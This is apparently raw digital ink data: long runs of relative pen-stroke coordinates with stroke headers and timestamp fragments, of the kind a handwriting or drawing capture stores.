0 0,10 0 0,-9 0 0,11 0 0,13 0 0,-8 0 0,5 0 0,2 0 0,1 0 0,0 0 0,8 0 0,-19 0 0,-1 0 0,5 0 0,-11 0 0,27 0 0,-34 0 0,47 0 0,-47 0 0,21 0 0,-11 0 0,-2 0 0,12 0 0,0 4 0,-7-3 0,6 4 0,-6-5 0,0 0 0,-1 0 0,-7 0 0,0 0 0,0 0 0,0 0 0,6 0 0,10 0 0,-11 0 0,20 0 0,-21 0 0,17 0 0,-6 0 0,0 0 0,0 0 0,-1 0 0,-5 0 0,19 0 0,-8 0 0,-1 0 0,25 0 0,-28 0 0,32 0 0,-36 0 0,14 0 0,-14 0 0,12 0 0,22 0 0,-38 0 0,-1 0 0,-1 0 0,3 0 0,38 0 0,-37 0 0,34 5 0,-43-3 0,34 8 0,-25-9 0,7 8 0,5-3 0,-14 0 0,-1 3 0,-1-4 0,-4 1 0,4 2 0,1-2 0,-5-1 0,11 4 0,11-2 0,-18-1 0,20 3 0,-8-2 0,-12-1 0,21 4 0,-31-9 0,17 3 0,-11-4 0,11 5 0,-12-4 0,27 3 0,-28-4 0,43 0 0,-29 0 0,25 0 0,-7 0 0,-1 0 0,-19 0 0,32 0 0,-28 0 0,32 0 0,-8 0 0,-7 0 0,-8 0 0,26 0 0,-27 0 0,-20 0 0,1 0 0,34 0 0,-19 0 0,16 0 0,-1-5 0,0-2 0,-30 4 0,0-1 0,28-6 0,15 9 0,3-10 0,1 10 0,-41-5 0,-1 0 0,42 5 0,-41-2 0,-1 0 0,34 3 0,-9 0 0,-31 0 0,0 0 0,20 0 0,-19-2 0,1-1 0,26 2 0,7-4 0,-6 5 0,7 0 0,-9 0 0,-19 0 0,22 0 0,-28 0 0,23 0 0,-14 0 0,0 0 0,-6-4 0,-3 3 0,-6-4 0,-1 1 0,1 3 0,-5-7 0,17 7 0,-20-6 0,43 6 0,-29-3 0,24-1 0,-21 4 0,4-3 0,20 4 0,-5 0 0,21 0 0,-18-5 0,8 3 0,-6-8 0,-9 9 0,-19-4 0,-2-1 0,8 4 0,1-4 0,1 1 0,-5 3 0,29-8 0,-22 9 0,26-10 0,-5 5 0,12-1 0,-8-3 0,-6 8 0,14-8 0,-8 8 0,10-9 0,-29 10 0,14-9 0,-23 3 0,36 1 0,-26-3 0,-14 5 0,0 1 0,12-2 0,29-6 0,-11 4 0,-18 1 0,-16 0 0,-2 1 0,6-1 0,0 0 0,0-1 0,-6 2 0,4-1 0,0 0 0,2 0 0,23 0 0,-2-4 0,-9 3 0,6 1 0,1 1 0,-16 0 0,35 4 0,-42-4 0,31 5 0,-44 0 0,10 0 0,12 0 0,-30 0 0,16 0 0,-22 0 0,-4 0 0,17 0 0,-16 0 0,8 0 0,4 0 0,-9 0 0,6 0 0,0 0 0,-4 0 0,0 0 0,15 0 0,-18 0 0,32 0 0,-32 0 0,21 0 0,-19 0 0,4 0 0,10 0 0,-18 0 0,12 0 0,-5-3 0,-2 2 0,3-2 0,1 0 0,-14 2 0,18-5 0,-13 6 0,5-3 0,6 1 0,-9 1 0,4-2 0,1 10 0,-8-6 0,11 9 0,-7-10 0,2 3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6:21.410"/>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1 194 16383,'86'0'0,"-7"0"0,-32 4 0,0-3 0,1 4 0,-7-2 0,-1-2 0,-6 3 0,-5-4 0,4 4 0,-9-3 0,4 3 0,10-4 0,-12 0 0,17 3 0,-14-2 0,1 3 0,3-4 0,-5 0 0,6 0 0,-5 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-7 0 0,7 0 0,-11 0 0,1 0 0,10 0 0,-7 0 0,7 0 0,-10 0 0,0 0 0,4 0 0,-3 0 0,4 0 0,0 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,0 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,1 0 0,-1 0 0,0 0 0,6 0 0,-5 0 0,11 0 0,-5 0 0,7 0 0,-2 0 0,1 0 0,-1-4 0,8 3 0,-6-7 0,6 2 0,-1 1 0,-4-3 0,5 7 0,-7-8 0,0 8 0,0-7 0,0 7 0,-6-3 0,4-1 0,-10 4 0,5-3 0,-6 4 0,0-4 0,0 3 0,0-2 0,-5 3 0,4 0 0,-4 0 0,5 0 0,0 0 0,1 0 0,4 0 0,-3 0 0,4 0 0,0 0 0,-4 0 0,4 0 0,-1 0 0,-3 0 0,9 0 0,-3 0 0,-1 0 0,5 0 0,-6 0 0,14 0 0,-6 0 0,12 0 0,-11 0 0,5-5 0,-7 4 0,0-7 0,0 3 0,0 0 0,0 1 0,6-1 0,10-1 0,1-5 0,-7 5 0,1-3 0,7 8 0,-11-7 0,20 7 0,-24-3 0,12-1 0,0 4 0,15-9 0,-4 4 0,-6-1 0,24-4 0,-28 10 0,13-9 0,13 9 0,-40-7 0,4 7 0,2 1 0,13-4 0,14 4 0,-15 0 0,-5 0 0,2 0 0,5 0 0,-7 0 0,0 0 0,0-4 0,-6 2 0,20-2 0,-34 4 0,46 0 0,-57 0 0,42 0 0,-28 0 0,10 4 0,21 2 0,-17 9 0,25 3 0,-33 1 0,31 9 0,-41-13 0,34 7 0,-32-9 0,10 2 0,-6 0 0,-6-2 0,-1-4 0,-6 0 0,0-1 0,0 1 0,0-1 0,6 1 0,-14-1 0,12 1 0,-18-6 0,19 5 0,-14-3 0,26 0 0,-28 1 0,27-5 0,-23 6 0,19-6 0,-11 3 0,5-4 0,-6 0 0,0 0 0,-4 0 0,3 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,0 0 0,1 0 0,5 0 0,0 0 0,0 0 0,0 0 0,6-5 0,-5 4 0,11-7 0,-11 7 0,11-7 0,-11 7 0,11-8 0,9 8 0,-10-3 0,37 4 0,-41 0 0,27 0 0,-5 0 0,-17 0 0,28 0 0,-17 0 0,-6 0 0,22 0 0,-22 0 0,5 0 0,3 0 0,-10 0 0,13 0 0,-7 0 0,-1 4 0,0-3 0,-5 8 0,4-8 0,-11 3 0,3-4 0,-3 0 0,5 0 0,-6 0 0,5 0 0,-5 0 0,7 0 0,-7 0 0,-1 0 0,-6 0 0,0 0 0,-5 0 0,-1 0 0,-5 0 0,4 0 0,5-3 0,2 3 0,8-3 0,-6 3 0,10-4 0,-5 3 0,6-8 0,0 4 0,1-4 0,5 3 0,-4-2 0,11-2 0,-11 3 0,5-6 0,-1 7 0,-4-3 0,12 3 0,-13-2 0,5 3 0,-6 0 0,-6 0 0,-1 5 0,-6 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-5 0 0,3 0 0,-2 0 0,10 0 0,-5 0 0,5-3 0,0 2 0,1-3 0,7 4 0,-1 0 0,0 0 0,0 0 0,0-4 0,7 3 0,-5-3 0,4-1 0,-5 4 0,-7-7 0,5 3 0,-11-3 0,5 2 0,-6-1 0,0 6 0,-4-3 0,2 4 0,10-5 0,-5 4 0,22-3 0,-9 4 0,-1 0 0,3 0 0,-10 0 0,11 0 0,-10 0 0,10 0 0,-18 0 0,5 0 0,-6 0 0,0 0 0,-4 0 0,3 0 0,-4 0 0,0 0 0,4 0 0,-4 0 0,5 0 0,0 0 0,6 0 0,-5 0 0,25 0 0,-21 0 0,21 0 0,-12 0 0,0 4 0,6 1 0,-7 0 0,0 4 0,0-4 0,0 4 0,0 1 0,0-5 0,0 3 0,0-7 0,0 4 0,0-5 0,0 4 0,6-3 0,3 8 0,-1-8 0,6 3 0,-13-4 0,12 5 0,-11-4 0,5 8 0,-7-8 0,-6 3 0,-1-4 0,-6 0 0,0 0 0,1 0 0,-6 0 0,-1 0 0,-4 0 0,1 0 0,2-2 0,-2-2 0,0-1 0,0-1 0,1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38:01.014"/>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0 1 16383,'36'0'0,"8"0"0,-18 0 0,19 0 0,-15 0 0,10 0 0,-6 0 0,6 0 0,-9 0 0,13 0 0,-7 0 0,4 0 0,-1 0 0,-6 0 0,-5 0 0,4 0 0,-4 0 0,0 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,9 0 0,-4 0 0,20 3 0,-11-2 0,11 3 0,-9 0 0,-5-3 0,5 4 0,0-1 0,-4-3 0,4 3 0,-6 0 0,-5-3 0,-2 2 0,-4 1 0,0-3 0,0 2 0,-4-3 0,-1 3 0,-1-2 0,2 2 0,4 0 0,0-2 0,0 6 0,5-6 0,1 2 0,11 1 0,-5 1 0,11 0 0,-5 3 0,12-7 0,-4 8 0,5-8 0,-7 3 0,0 0 0,-6-3 0,-1 3 0,-11-4 0,-2 0 0,-8 0 0,-2 0 0,-6 0 0,-2 0 0,2 0 0,-2 0 0,7 0 0,0 0 0,3 0 0,4 0 0,10 0 0,10 0 0,0 0 0,9 0 0,-4 0 0,1 0 0,10 0 0,-4 0 0,0 0 0,-2 0 0,-12 0 0,-1 0 0,-6 0 0,-5 0 0,-5 0 0,-6 0 0,-8 0 0,-1 0 0,2 0 0,-1-2 0,1 1 0,4-2 0,0 3 0,11 0 0,15 0 0,-9-3 0,41 2 0,-37-2 0,39-2 0,-26 4 0,1-7 0,-4 7 0,-12-3 0,-9 4 0,-2-3 0,-10 2 0,-3-2 0,0-1 0,-5-2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10:17:10.02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16383,'62'0'0,"-17"0"0,20 0 0,-31 0 0,26 0 0,-19 0 0,6 0 0,0 0 0,-10 0 0,2 4 0,-10-3 0,0 6 0,-1-3 0,-9 3 0,2-3 0,-6 2 0,3-5 0,-5 2 0,7 0 0,-1-2 0,11 6 0,-6-6 0,4 2 0,0 1 0,-4-3 0,4 3 0,-9-4 0,2 0 0,-9 0 0,7 0 0,-6 3 0,3-2 0,2 4 0,-4-2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00:52.546"/>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0 260 16383,'69'0'0,"-1"0"0,-6 0 0,0 0 0,0 0 0,0 0 0,-7 0 0,0 0 0,8 0 0,0 0 0,-4 0 0,-1 0 0,7 0 0,-4 0 0,17 0 0,-2 0 0,-5 0 0,-29 0 0,30 0 0,3 0 0,-14 0 0,-6 0 0,3 0 0,31 0 0,6 0 0,-20 0 0,6 0 0,-17 0 0,15 0 0,-8 0 0,-2 0 0,-14 0 0,-1 0 0,-7 0 0,14-5 0,-4 4 0,13-4 0,-15 5 0,-1 0 0,0 0 0,1-5 0,0 4 0,6-8 0,-12 8 0,4-4 0,1 0 0,9 4 0,-12-7 0,9 7 0,-12-7 0,0 6 0,6-6 0,-13 7 0,5-3 0,-5-1 0,6 4 0,0-7 0,0 7 0,0-3 0,7-1 0,1-1 0,1 1 0,-3-4 0,-6 4 0,-6-1 0,-1-2 0,-6 7 0,0-6 0,1 6 0,11-3 0,-3 0 0,17 3 0,3-8 0,1 7 0,20-3 0,-10 0 0,-2 4 0,3-9 0,-11 9 0,7-9 0,-9 9 0,-2-3 0,2-1 0,-10 3 0,30-8 0,-29 9 0,32-5 0,-34 3 0,16 2 0,-25-3 0,12 4 0,-8-4 0,1 3 0,-5-4 0,4 5 0,-11 0 0,10-4 0,-9 3 0,9-3 0,-4 0 0,6 3 0,0-3 0,0 4 0,22 0 0,-23 0 0,29 0 0,-10 0 0,-12 0 0,22 0 0,-32 0 0,17 0 0,-5 0 0,1 0 0,25 0 0,-5 0 0,11 0 0,-22 0 0,1 0 0,-14 0 0,10 0 0,-8 0 0,-13 0 0,-1 0 0,-11 0 0,-6 0 0,5 0 0,-2 0 0,5 0 0,-2 0 0,-7 0 0,17 0 0,-13 0 0,12 0 0,-19 0 0,13 0 0,-5 0 0,8 0 0,-6 0 0,-1 0 0,1 0 0,5 0 0,6 0 0,1 0 0,1 0 0,-3 0 0,-9 0 0,-3 0 0,-4 0 0,2 0 0,9 0 0,-7 0 0,6 0 0,-5 0 0,1 0 0,1 0 0,-2 0 0,-4 0 0,1 0 0,1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10:17:08.15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6 16383,'62'-3'0,"6"1"0,-41 2 0,12 0 0,-4 0 0,-10 0 0,1 0 0,-7 0 0,0 0 0,-1 0 0,-5 0 0,7 0 0,0 0 0,5 0 0,-2 0 0,5 0 0,-4 0 0,9 0 0,-9 0 0,4 0 0,0 0 0,-3 0 0,2 0 0,-8 0 0,3 0 0,-7 0 0,2 0 0,1 0 0,-3 0 0,2 0 0,7 0 0,-4 0 0,9 0 0,-10 0 0,3 0 0,-3 0 0,4 0 0,0 0 0,-5 0 0,4 0 0,-7 0 0,2 0 0,0 0 0,-4 0 0,5 0 0,-3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10:17:05.99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75 16383,'83'0'0,"-21"0"0,-2 0 0,-12 0 0,1 0 0,4 0 0,-11 0 0,-7 0 0,-7 0 0,-9 0 0,-2 0 0,-3 0 0,3-4 0,2 4 0,4-7 0,5 6 0,1-6 0,5 6 0,1-7 0,-1 7 0,-5-6 0,-1 6 0,-5-2 0,0-1 0,0 4 0,0-4 0,-5 1 0,4 2 0,-7-2 0,7 0 0,-8 2 0,8-2 0,-7 3 0,3 0 0,-3-3 0,-2 2 0,4-1 0,-1 2 0,0 0 0,3 0 0,-5 0 0,1-3 0,3 3 0,0-3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42:51.15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5143 1 16383,'-86'0'0,"6"0"0,10 0 0,0 0 0,-26 0 0,14 0 0,30 0 0,0 0 0,-29 0 0,-5 0 0,7 0 0,-7 0 0,30 0 0,-16 0 0,3 0 0,18 0 0,-18 0 0,12 0 0,15 0 0,-20 0 0,0 0 0,21 0 0,-27 0 0,5 0 0,16 0 0,-20 0 0,3 0 0,18 0 0,-43 0 0,48 0 0,-49 0 0,49 0 0,-26 4 0,3-3 0,23 3 0,-26-4 0,9 0 0,16 0 0,-39 0 0,47 4 0,-20-3 0,0 2 0,20-3 0,-18 0 0,10 0 0,10 0 0,-9 4 0,1-3 0,17 2 0,-16-3 0,15 0 0,0 3 0,-4-2 0,5 3 0,-5-1 0,4-2 0,-4 3 0,6-4 0,-6 0 0,3 4 0,-7-4 0,7 4 0,-2-4 0,8 0 0,-13 0 0,14 0 0,-14 0 0,18 0 0,-13 0 0,11 0 0,-11 0 0,12 3 0,-12-2 0,12 2 0,-8-3 0,9 3 0,-3-3 0,2 3 0,-7 1 0,11-3 0,-15 6 0,17-6 0,-17 3 0,11-1 0,-8 1 0,0 1 0,0 1 0,4-2 0,-3 0 0,-1 3 0,3-3 0,-7 1 0,3 1 0,4-2 0,-7 1 0,-2 2 0,7-3 0,-10 1 0,8 2 0,-5-2 0,-5 3 0,0 1 0,5-1 0,-4-4 0,4 3 0,-5-2 0,-6 4 0,14-4 0,-12-1 0,13 0 0,-4-3 0,-4 3 0,9-1 0,-4-2 0,0 2 0,4-3 0,-4 0 0,5 0 0,0 0 0,0 0 0,1 0 0,3 0 0,-3 0 0,3 0 0,-4 0 0,0 0 0,-5 0 0,4 0 0,1 0 0,1 0 0,3 0 0,0-3 0,2 2 0,4-4 0,-2 4 0,-2-1 0,1 2 0,-1 0 0,2 0 0,1 0 0,-3 0 0,5-9 0,-2-1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42:48.90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2384 1 16383,'-43'0'0,"2"0"0,-2 0 0,3 0 0,-5 0 0,8 0 0,12 0 0,-22 0 0,19 0 0,-16 0 0,28 0 0,-27 0 0,20 0 0,-17 0 0,17 0 0,0 0 0,-10 0 0,7 0 0,-7 0 0,5 0 0,-14 0 0,10 0 0,-13 0 0,-4 0 0,10 0 0,-15 0 0,14 0 0,-8 4 0,10-3 0,-7 4 0,21-5 0,-15 0 0,18 0 0,-12 0 0,14 0 0,1 0 0,-15 0 0,16 0 0,-16 0 0,10 0 0,-12 0 0,8 0 0,-23 0 0,27 0 0,-22 0 0,21 0 0,-9 0 0,4 0 0,0 0 0,1 0 0,9 0 0,2 0 0,3 0 0,-6 0 0,8 0 0,-8 0 0,-1 0 0,8 0 0,-16 0 0,9 0 0,0 0 0,-3 0 0,6 0 0,-12 0 0,7 0 0,-5 0 0,13 0 0,0 0 0,-4 0 0,4 0 0,-4 0 0,0 0 0,4 0 0,-21 0 0,18 0 0,-21 0 0,13 0 0,-4 0 0,1 3 0,5-2 0,8 3 0,-2-4 0,5 2 0,-3 2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45:03.5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2462 1 16383,'-65'0'0,"0"0"0,-8 0 0,13 0 0,30 0 0,-59 0 0,56 0 0,-37 0 0,14 0 0,20 0 0,-29 0 0,39 0 0,-40 0 0,39 0 0,-33 0 0,15 0 0,11 0 0,-24 0 0,15 0 0,-12 0 0,6 0 0,-4 0 0,-2 0 0,10 0 0,-9 0 0,20 0 0,-19 0 0,23 0 0,-22 0 0,32 0 0,-4 0 0,-8 0 0,15 0 0,-16 0 0,18 0 0,-17 0 0,14 0 0,-14 0 0,13 0 0,0 0 0,-13 0 0,15 0 0,-11 0 0,11 0 0,-7 0 0,4 0 0,-7 3 0,-2-2 0,3 2 0,-8 1 0,12-3 0,-12 2 0,13-3 0,-12 0 0,14 0 0,0 0 0,-2 3 0,6-2 0,-3 3 0,-1-4 0,7 0 0,-9 0 0,4 0 0,3 0 0,-15 0 0,16 0 0,-10 0 0,5 0 0,-1 0 0,1 0 0,-4 0 0,10 0 0,-4 3 0,5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44:54.38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3571 31 16383,'-76'0'0,"0"0"0,-10 0 0,-12 0 0,45 0 0,-2 0 0,-3 0 0,-1 0 0,-5 0 0,1 0 0,8 0 0,0 0 0,-5 0 0,4 0 0,-13 0 0,-13 0 0,7 0 0,16 0 0,-16 0 0,16 0 0,17 0 0,-24 0 0,16 0 0,5 0 0,-37 0 0,41 0 0,-49 0 0,30 0 0,-1-5 0,-3-1 0,-16 4 0,21-4 0,4 1 0,8 5 0,-25 0 0,43 0 0,-30 0 0,23 0 0,-5 0 0,-11 0 0,20 0 0,-33 0 0,36 0 0,-30 0 0,23 0 0,-6 0 0,-17 0 0,29 0 0,-28 0 0,32 0 0,-9 0 0,-10 0 0,17 0 0,-16 0 0,14 0 0,-3 0 0,-2 0 0,2 0 0,-2 0 0,6 0 0,2 0 0,4 0 0,4 0 0,5 0 0,-3-3 0,1 3 0,0-3 0,-11 3 0,15 0 0,-15 0 0,9 0 0,-5 0 0,0 0 0,4 0 0,1 0 0,6 0 0,-1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7:45:13.75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2666 8 16383,'-67'0'0,"-15"0"0,9 0 0,18 0 0,-4 0 0,-2 0 0,-1 0 0,-3 0 0,-2 0 0,-7 0 0,1 0 0,17 0 0,1 0 0,-8 0 0,2 0 0,-16 0 0,-16 0 0,41 0 0,2 0 0,-18 0 0,17 0 0,-1 0 0,-22 0 0,18 0 0,-21 0 0,29 0 0,-1 0 0,-5 0 0,18 0 0,-3 0 0,4 0 0,5 0 0,-4 0 0,11 0 0,4 0 0,-7 0 0,10 0 0,-11 0 0,-2 0 0,3 0 0,-8 0 0,-6 0 0,13-4 0,-18 3 0,3-2 0,10 3 0,-8 0 0,17 0 0,0 0 0,4 0 0,2 0 0,4 0 0,-4 0 0,3 0 0,-6 0 0,6 0 0,-6 0 0,5 0 0,-6 0 0,6 0 0,-3 0 0,3 0 0,2 0 0,-1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8:44:14.730"/>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1 129 16383,'99'0'0,"-21"0"0,-33 0 0,-15 0 0,10 0 0,-11 0 0,4 0 0,-9 0 0,9 0 0,-9 0 0,4 0 0,5 0 0,-8 0 0,8 0 0,-10 0 0,2 0 0,4 0 0,-1 0 0,-3 0 0,5 0 0,-4 0 0,5 0 0,3 0 0,-9 0 0,0 0 0,2 0 0,0 0 0,-1 0 0,7 0 0,-1 0 0,-1 0 0,3 0 0,-6 0 0,-4 0 0,9 0 0,-4 0 0,5 0 0,0 0 0,0 0 0,0 0 0,-5 0 0,-1 0 0,6-3 0,-8 2 0,8-2 0,-11 3 0,5 0 0,1 0 0,5 0 0,0 0 0,0 0 0,6 0 0,-6 0 0,1-3 0,-2 2 0,-4-3 0,0 4 0,4 0 0,-9-3 0,9 2 0,-4-2 0,5 3 0,0 0 0,0 0 0,6 0 0,-4 0 0,4 0 0,-7 0 0,2 0 0,-7 0 0,5 0 0,-4 0 0,5 0 0,0 0 0,13 0 0,-15 0 0,19 0 0,-8 0 0,0 0 0,16 0 0,5 0 0,-11 0 0,37-6 0,-49 5 0,33-4 0,-24 5 0,5-4 0,6 2 0,-13-6 0,6 7 0,-7-3 0,6-1 0,-4 4 0,10-8 0,-10 4 0,5-1 0,0-2 0,16 1 0,-5 1 0,12 1 0,-8 5 0,3 0 0,14 0 0,3 0 0,-14 0 0,8 0 0,-10 0 0,22 0 0,-18 0 0,-22 0 0,-3 0 0,-3 0 0,42 0 0,-40 0 0,34 0 0,-12 0 0,-6 0 0,22 0 0,-26 0 0,12 0 0,-1 0 0,-23 0 0,26 0 0,-13 0 0,5 0 0,-7 0 0,16 0 0,-25 0 0,37 0 0,-49 0 0,33 0 0,-24 0 0,11 0 0,-5 0 0,-3 0 0,-6 0 0,-5 0 0,-3 0 0,-5 0 0,0 0 0,1 0 0,-1 0 0,0 0 0,-5 0 0,4 0 0,-4 0 0,5 0 0,-5 0 0,-1 0 0,-5 0 0,6 0 0,1 0 0,6-4 0,-14 3 0,14-3 0,-18 4 0,15-3 0,-5 2 0,-4-2 0,9 3 0,-13-3 0,24 2 0,-21-2 0,42 3 0,-35 0 0,42 0 0,-43 0 0,52 0 0,-46 0 0,55 0 0,-37 0 0,32 0 0,-21 0 0,21 0 0,-13 0 0,23 0 0,-8 0 0,2 0 0,6 0 0,-6 0 0,-1 5 0,-15-4 0,-5 9 0,-6-4 0,26 5 0,-25 3 0,20-1 0,-40 4 0,10 2 0,-11 0 0,-7 2 0,-8-5 0,-4-4 0,4-4 0,14-5 0,14-3 0,16 0 0,7 0 0,8 0 0,3 6 0,-1 0 0,-1 6 0,-35-7 0,2 2 0,2 2 0,0 1 0,-4-3 0,1 0 0,4 2 0,-2 1 0,16 0 0,16-3 0,-10-2 0,-6-5 0,-1 0 0,-1 0 0,2 0 0,0 0 0,-14 0 0,27 0 0,-13 0 0,27 5 0,-3-4 0,-7 9 0,9-3 0,-8 5 0,5-6 0,-27 4 0,9-9 0,-21 7 0,-5-6 0,2 2 0,-21-4 0,2 0 0,-14 0 0,7 0 0,-2 0 0,15 0 0,2 0 0,13 0 0,-6-4 0,12 3 0,11-9 0,10 4 0,8-6 0,-16 1 0,2 5 0,-11-3 0,8 8 0,-10-4 0,-8 0 0,-7 4 0,-5-3 0,-7 4 0,-2 0 0,-4 0 0,5 0 0,6 0 0,-5 0 0,25 0 0,-21 0 0,21 0 0,-19 0 0,12 0 0,-4 0 0,4 0 0,-6 0 0,0 0 0,0 0 0,0 4 0,-6-3 0,-1 4 0,-6-5 0,-5 0 0,-1 0 0,-5 0 0,5 0 0,-4 0 0,15 0 0,-18 0 0,23 0 0,-23 0 0,18 0 0,-10 0 0,5 0 0,6 0 0,1 0 0,0 0 0,5-5 0,-5 4 0,7-3 0,-1 4 0,0 0 0,0 0 0,0 0 0,-1 0 0,-4 0 0,3 0 0,-9 0 0,4 0 0,-6 4 0,0-3 0,-5 6 0,-1-6 0,1 2 0,-6 0 0,6-2 0,-6 1 0,3-2 0,4 0 0,-8 0 0,8 0 0,-7 0 0,6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8:44:09.613"/>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0 153 16383,'91'0'0,"-6"0"0,-24 0 0,-11 0 0,1 0 0,-3-4 0,1 3 0,-1-4 0,-13 5 0,-7 0 0,0 0 0,-4 0 0,4 0 0,1 0 0,-5 0 0,11 0 0,-15 0 0,12 0 0,-12 0 0,8 0 0,-2 0 0,-1 0 0,3 0 0,2 0 0,-4 0 0,3 0 0,-6 0 0,4 0 0,3 0 0,-1 0 0,4 0 0,-9 0 0,4 0 0,5 0 0,-3 0 0,5 0 0,-7 0 0,-1 0 0,2 0 0,5 0 0,6 0 0,-4-8 0,9 7 0,-9-7 0,4 8 0,0 0 0,-10 0 0,9 0 0,-15-3 0,4 2 0,1-6 0,-9 6 0,14-6 0,-12 6 0,7-5 0,6 5 0,-9-6 0,7 3 0,-10-1 0,5-4 0,2 7 0,0-8 0,-2 9 0,0-6 0,-4 6 0,9-6 0,-4 6 0,5-3 0,-5 4 0,4 0 0,-9-4 0,4 4 0,1-4 0,-5 1 0,7 2 0,-6-5 0,2 5 0,-2-2 0,0-1 0,3 4 0,-4-4 0,21 0 0,-12 3 0,19-4 0,-11 5 0,6 0 0,0 0 0,0 0 0,0 0 0,0 0 0,-6 0 0,5 0 0,-11 0 0,11 0 0,-5 0 0,1 0 0,3 0 0,-3 0 0,-1 0 0,5 0 0,-11 0 0,5 0 0,-11 0 0,-5 0 0,2 0 0,0 0 0,-1 0 0,5 0 0,-1 0 0,-6 0 0,9 3 0,-3-2 0,-8 3 0,22-4 0,-21 0 0,8 0 0,3 0 0,-15 0 0,18 0 0,-11 3 0,-4-3 0,28 3 0,-25-3 0,31 5 0,-25-4 0,10 7 0,0-8 0,-5 4 0,5 0 0,-6-3 0,-5 3 0,-1-4 0,-3 0 0,4 0 0,3 0 0,10 0 0,-15 0 0,16 0 0,-4 0 0,-1 3 0,35-2 0,-17 2 0,31 2 0,-8-3 0,-1 8 0,9-4 0,10 6 0,2 0 0,-47-5 0,1-1 0,44 6 0,-22-1 0,8 0 0,-26-1 0,5 1 0,-14-6 0,-13 3 0,10-7 0,-22 5 0,12-5 0,-10 5 0,-8-5 0,24 8 0,-23-7 0,11 7 0,8-2 0,-13-3 0,35 2 0,-7-6 0,11-4 0,22 2 0,-12-2 0,0 4 0,2 0 0,-10 0 0,6 0 0,-2 0 0,-8 0 0,-6 0 0,-2 0 0,-6 0 0,0 0 0,-6 0 0,-6 0 0,-7 0 0,-3 0 0,-1 0 0,7 0 0,-6 0 0,9 0 0,-5 0 0,1 0 0,3 0 0,-9 0 0,3 0 0,11 0 0,-11-4 0,11 4 0,-10-8 0,1 7 0,0-6 0,4 6 0,-4-6 0,0 6 0,4-6 0,-4 6 0,0-6 0,3 6 0,-3-3 0,5 4 0,6-4 0,15 3 0,-15-3 0,25 4 0,-27 0 0,16 0 0,-1 0 0,-4 0 0,11 0 0,-11-4 0,11 3 0,3-3 0,-12 4 0,31 0 0,-22 0 0,27 0 0,-9 0 0,-19 0 0,15 0 0,-15 0 0,36 5 0,-32 1 0,21 5 0,-35-2 0,13 2 0,-7-1 0,-1-5 0,-13-1 0,-6-4 0,-11 0 0,0 0 0,20 0 0,5 0 0,21 0 0,-9 0 0,9 0 0,-6 0 0,29 6 0,-1 1 0,-6 9 0,-36-10 0,-1 1 0,10 7 0,19-3 0,-23-1 0,-1 0 0,-13-1 0,-1-4 0,-6-1 0,-5 0 0,4-4 0,-4 4 0,11-4 0,-4 0 0,9 0 0,-3 0 0,5 0 0,0 0 0,-6 0 0,4 0 0,-9 0 0,10 0 0,-11 0 0,5 0 0,-6 0 0,0 0 0,0-4 0,-5 0 0,4-1 0,-9-2 0,4 7 0,5-7 0,-8 3 0,8-1 0,-5-2 0,1 6 0,5-3 0,6 4 0,1 0 0,6 0 0,0-4 0,0 3 0,0-7 0,0 7 0,1-12 0,-1 7 0,0-8 0,6 0 0,-4 3 0,5-7 0,15 1 0,-22 6 0,43-11 0,-50 16 0,35-11 0,-26 8 0,13-1 0,25-2 0,-19 1 0,12 0 0,-5 0 0,-28 6 0,28-5 0,-1 9 0,-18-4 0,42 5 0,-56 0 0,32 0 0,-9 0 0,-11 0 0,34 0 0,-42 0 0,44 0 0,-44 0 0,36 0 0,-37 4 0,16 1 0,-14 5 0,-11-5 0,-3 2 0,-14-6 0,17 3 0,-8-4 0,15 0 0,-3 0 0,-4 0 0,32 5 0,-27 0 0,33 6 0,-31-2 0,17 1 0,-17 0 0,8-1 0,-15 0 0,4 0 0,-6-1 0,0 1 0,0-1 0,0 1 0,-5-5 0,-1 0 0,-5-4 0,6 0 0,-3 0 0,2 0 0,-4 0 0,-2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8:44:03.184"/>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0 255 16383,'99'0'0,"0"0"0,-21 0 0,3 0 0,-30 0 0,0 0 0,40 0 0,-7 0 0,0 0 0,-21 0 0,7 4 0,-2-3 0,-12 4 0,-3-5 0,-5 0 0,-1 0 0,0 4 0,-6-3 0,5 3 0,-5-4 0,1 0 0,3 0 0,3 0 0,1 0 0,4 0 0,1 0 0,1 0 0,0 0 0,5 0 0,-11 0 0,11 0 0,-12 0 0,6 0 0,-13 0 0,5 0 0,-4 0 0,-1 0 0,5 0 0,-5 0 0,6 0 0,0 0 0,-1 0 0,24 0 0,-29 0 0,48 0 0,-53 0 0,39 5 0,-26 1 0,29 5 0,-30-2 0,7-3 0,-27-2 0,0-4 0,6-4 0,28-2 0,-21 0 0,33-3 0,0 2 0,-18 1 0,35 0 0,-47 2 0,24 3 0,-19-8 0,4 8 0,-11-7 0,3 7 0,-9-6 0,4 2 0,0 0 0,-5-3 0,11 8 0,-5-8 0,6 7 0,0-8 0,-1 8 0,1-7 0,-5 7 0,3-4 0,-9 2 0,10-2 0,-11-4 0,11 4 0,-5-3 0,6 3 0,0-5 0,-5 5 0,3-4 0,-3 8 0,-1-3 0,-1 4 0,0 0 0,-5-4 0,17 4 0,-15-4 0,16 4 0,-12 0 0,28 0 0,-22 0 0,43 0 0,-49 0 0,34 0 0,-26 0 0,6 0 0,-8 4 0,-7 0 0,-15 1 0,-2 2 0,2-6 0,-2 2 0,8-3 0,-6 0 0,-2 0 0,5 0 0,7 0 0,6 0 0,6 0 0,14 0 0,-4 0 0,0 0 0,2 0 0,-16 4 0,11 1 0,0 5 0,-6-1 0,0 1 0,-8-1 0,-5-1 0,-1 1 0,-4-4 0,3-2 0,3-3 0,6 0 0,5-4 0,14-2 0,12-5 0,16 5 0,-15 1 0,9 5 0,-18-5 0,12 3 0,-6-3 0,-3 5 0,-6 0 0,-12 0 0,2 0 0,-16 0 0,3-3 0,-9 2 0,-2-3 0,-1 0 0,-2 3 0,3-3 0,5 4 0,-12 0 0,11 0 0,-11-2 0,5 1 0,2-2 0,-1 3 0,5 0 0,-6 0 0,3 0 0,-6 0 0,15 0 0,-6 0 0,12 0 0,-9 0 0,-6 0 0,4 0 0,-9 0 0,10 0 0,-14 0 0,10 0 0,-2 0 0,-6 0 0,11 0 0,-4 0 0,3 0 0,8 0 0,-11 0 0,3 0 0,3 0 0,6-4 0,1 3 0,3-7 0,11 2 0,-12 0 0,15-3 